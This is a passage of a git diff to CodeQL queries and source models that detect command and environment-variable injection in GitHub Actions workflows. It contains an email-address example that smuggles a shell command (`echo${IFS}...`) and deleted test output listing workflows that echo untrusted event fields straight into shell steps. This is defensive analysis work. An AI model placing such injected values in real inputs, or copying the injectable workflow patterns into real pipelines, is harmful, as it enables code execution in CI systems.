`echo${IFS}hello`@domain.com + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + ] + | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } -private class EventSource extends RemoteFlowSource { +bindingset[context] +private predicate usernameEvent(string context) { + exists(string reg | + reg = + [ + // username + // All characters must be either a hyphen (-) or alphanumeric + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate pathEvent(string context) { + exists(string reg | + reg = + [ + // filename + "github\\.event\\.workflow\\.path", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate jsonEvent(string context) { + exists(string reg | + reg = + [ + // json + "github\\.event", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +class EventSource extends RemoteFlowSource { + string flag; + EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlled(context) or - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) or - isExternalUserControlledRepositoryDispatch(context) or - isExternalUserControlledWorkflowDispatch(context) + titleEvent(context) and flag = "title" + or + urlEvent(context) and flag = "url" + or + textEvent(context) and flag = "text" + or + repoNameEvent(context) and flag = "repo name" + or + branchEvent(context) and flag = "branch" + or + labelEvent(context) and flag = "label" + or + emailEvent(context) and flag = "email" + or + usernameEvent(context) and flag = "username" + or + pathEvent(context) and flag = "filename" + or + jsonEvent(context) and flag = "json" ) } - override string getSourceType() { result = "User-controlled events" } + override string getSourceType() { result = flag } } /** * A Source of untrusted data defined in a MaD specification */ -private class ExternallyDefinedSource extends RemoteFlowSource { +class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } @@ -178,19 +244,19 @@ private class ExternallyDefinedSource extends RemoteFlowSource { /** * An input for a Composite Action */ -private class CompositeActionInputSource extends RemoteFlowSource { +class CompositeActionInputSource extends RemoteFlowSource { CompositeAction c; CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - override string getSourceType() { result = "Composite action input" } + override string getSourceType() { result = "input" } } /** * A downloadeded artifact. */ -private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } +private class ArtifactSource extends RemoteFlowSource { + ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } - override string getSourceType() { result = "Step output from Artifact" } + override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index cdcc1dbdf81..6e6e768bdf7 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -7,14 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { -// exists(Expression expr, Run run, string varName, string key, string value | -// expr = run.getInScopeEnvVarExpr(varName) and -// Utils::writeToGitHubEnv(run, key, value) and -// expr = sink.asExpr() and -// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") -// ) -// } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 63e99abd4d3..fe3c3e58b5f 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index f2b8c8549a9..4d12a293696 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index 21688675a2e..a4539923b35 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"] + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index f90eaeb7271..472778d33b4 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"] + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 14743f2819e..79621a6a30c 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"] + - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index ecfce617df4..71d83774231 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index acb5d462d15..062203945c5 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -8,4 +8,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"] + - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 0d96077345f..9cc02d3b38c 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"] + - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index 38253b68934..e74f953a1a1 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.removed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "filename", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index bbfc0bed1df..9a58d9a764f 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index 7a556a0f0ec..c8646cffe8e 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index 9b0ec011fd6..a85a4b466e2 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 753303b0cb3..d98eda4e69f 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"] + - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fb15abce061..60fa0149573 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 8e4938368b8..9dccf6d5e6c 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index 61141e5f73b..b8fb2514253 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"] - - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"] - - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"] - - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_modified", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_removed", "filename", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index c80590e4931..499161aafcb 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"] + - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 2a4378d1712..173ecfc4222 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 720b7aed8cc..50ad0149703 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -25,6 +25,12 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index af3f2998cc9..109d77d7425 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -25,7 +25,14 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() - ) + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) and + not source.getNode().(RemoteFlowSource).getSourceType() = "branch" ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index 3e7c74ab895..593fd620c9f 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -22,6 +22,12 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and j.isPrivileged() + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index aac7568e654..bf637af1195 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -22,7 +22,14 @@ where exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and j.isPrivileged() - ) + ) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) and + not source.getNode().(RemoteFlowSource).getSourceType() = "branch" select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual deleted file mode 100644 index ee68d409634..00000000000 --- a/ql/test/library-tests/test.actual +++ /dev/null @@ -1,598 +0,0 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ 